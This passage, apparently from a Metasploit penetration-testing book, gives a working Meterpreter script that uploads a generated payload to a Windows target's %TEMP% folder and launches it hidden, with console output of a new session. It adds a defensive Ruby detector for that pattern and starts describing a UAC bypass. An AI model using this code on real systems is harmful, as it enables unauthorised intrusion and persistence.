Chapter 16

if client.platform =~ /win32|win64/
        # Resolve the target's %TEMP% directory and stage the payload there
        tempdir = client.fs.file.expand_path("%TEMP%")
        print_status("Uploading meterpreter to temp directory")
        raw = pay.generate
        exe = ::Msf::Util::EXE.to_win32pe(client.framework, raw)
        tempexe = tempdir + "\\" + filename
        tempexe.gsub!("\\\\", "\\")
        # Write the generated executable to the remote file system
        fd = client.fs.file.new(tempexe, "wb")
        fd.write(exe)
        fd.close
        print_status("Executing the payload on the system")
        execute_payload = "#{tempdir}\\#{filename}"
        # Launch the dropped executable as a hidden process
        pid = session.sys.process.execute(execute_payload, nil, {'Hidden' => true})
        print_status("Executed payload with PID #{pid}")
end


Now that we have our newly created Meterpreter script, let's launch Metasploit, get into Meterpreter, and execute the script:

meterpreter > run execute_upload -r -p 443

[*] Running payload handler
[*] Uploading meterpreter to temp directory
[*] Executing the payload on the system
[*] Sending stage (749056 bytes) to
[*] Meterpreter session 2 opened ( -> at Tue Nov 30 23:24:19 -0500 2010

meterpreter >

Success! We have created a Meterpreter script and successfully executed it to spawn a new Meterpreter shell. This is a small example of the power and flexibility of the Meterpreter scripting language and Ruby in general.
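From the defender's side, the script above leaves a recognisable trace: an executable is written into the user's %TEMP% directory and, moments later, launched as a hidden process. The following Ruby script is an added example (it is not from the book and is not part of Metasploit) that flags this drop-and-execute pattern in process and file telemetry. It assumes a constructed, hypothetical pipe-delimited log format (time|event|path|flags); real sensors such as Sysmon or an EDR emit different fields, so the parser would need adjusting before use.

```ruby
require 'time'

# Executables under a per-user temp directory, e.g. C:\Users\bob\AppData\Local\Temp\x.exe
TEMP_EXE = /\\AppData\\Local\\Temp\\[^\\]+\.exe\z/i
# A file written this many seconds (or fewer) before it is executed is treated as "just dropped"
WINDOW   = 60

# Parse one record in the constructed format: time|event|path|flags
# (hypothetical format for this example, not a real sensor's output)
def parse_event(line)
  ts, event, path, flags = line.chomp.split('|', 4)
  { time: Time.iso8601(ts), event: event, path: path, flags: (flags || '') }
end

# Returns one alert hash per process launched out of %TEMP%. Severity rises when
# the image was written shortly before launch and when it was started hidden,
# which together match the behaviour of the upload-and-execute script.
def detect_temp_drop_and_execute(lines)
  events = lines.map { |l| parse_event(l) }

  # Index file-creation times by (case-insensitive) path
  drops = Hash.new { |h, k| h[k] = [] }
  events.select { |e| e[:event] == 'FileCreate' }.each do |e|
    drops[e[:path].downcase] << e[:time]
  end

  alerts = []
  events.select { |e| e[:event] == 'ProcessCreate' && e[:path] =~ TEMP_EXE }.each do |e|
    recent_drop = drops[e[:path].downcase].any? { |t| t <= e[:time] && e[:time] - t <= WINDOW }
    hidden = e[:flags].include?('hidden=1')
    severity = if recent_drop && hidden then 'high'
               elsif recent_drop || hidden then 'medium'
               else 'low'
               end
    alerts << { path: e[:path], time: e[:time], severity: severity,
                dropped_recently: recent_drop, hidden: hidden }
  end
  alerts
end

# Constructed sample telemetry: one drop-and-hidden-execute sequence, one benign
# program launch, and one temp-directory launch without a preceding file write.
SAMPLE_LOG = [
  '2010-11-30T23:24:10|FileCreate|C:\Users\bob\AppData\Local\Temp\svc.exe|',
  '2010-11-30T23:24:19|ProcessCreate|C:\Users\bob\AppData\Local\Temp\svc.exe|hidden=1 ppid=1234',
  '2010-11-30T23:30:00|ProcessCreate|C:\Program Files\Vendor\app.exe|hidden=0',
  '2010-11-30T23:31:00|ProcessCreate|C:\Users\bob\AppData\Local\Temp\installer.exe|hidden=0',
]

if __FILE__ == $0
  detect_temp_drop_and_execute(SAMPLE_LOG).each do |a|
    puts "[#{a[:severity]}] #{a[:time].iso8601} #{a[:path]} " \
         "dropped_recently=#{a[:dropped_recently]} hidden=#{a[:hidden]}"
  end
end
```

Run against the sample, the script reports svc.exe as a high-severity hit (written to %TEMP% nine seconds before a hidden launch) and installer.exe as a low-severity one (a temp-directory launch with no recent write and a visible window). Tuning WINDOW and adding an allow-list of known installers is the usual next step to keep the low-severity alerts manageable.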

One important element to discuss briefly (as mentioned earlier) is the move to convert Meterpreter scripts to a format similar to the Metasploit modules. We'll use a small demo of a module built for bypassing the Windows 7 UAC. Windows Vista and later introduced a feature similar to that of UNIX- and Linux-based systems. With this feature, a user is assigned limited account permissions until administrative-level permissions are necessary. When the user needs admin rights to perform a task, a prompt appears, telling the user that admin rights are required and are being used. The ultimate goal of this feature is to protect against a compromise or virus infection and to limit exposure only to one user account.

In December 2010, Dave Kennedy and Kevin Mitnick released a new Meterpreter module that bypassed the Windows UAC component by injecting a payload into a process that had a trusted publisher certificate and was considered "UAC Safe." When injecting into the process, a DLL can be called, running under the context of that UAC Safe process, which then executes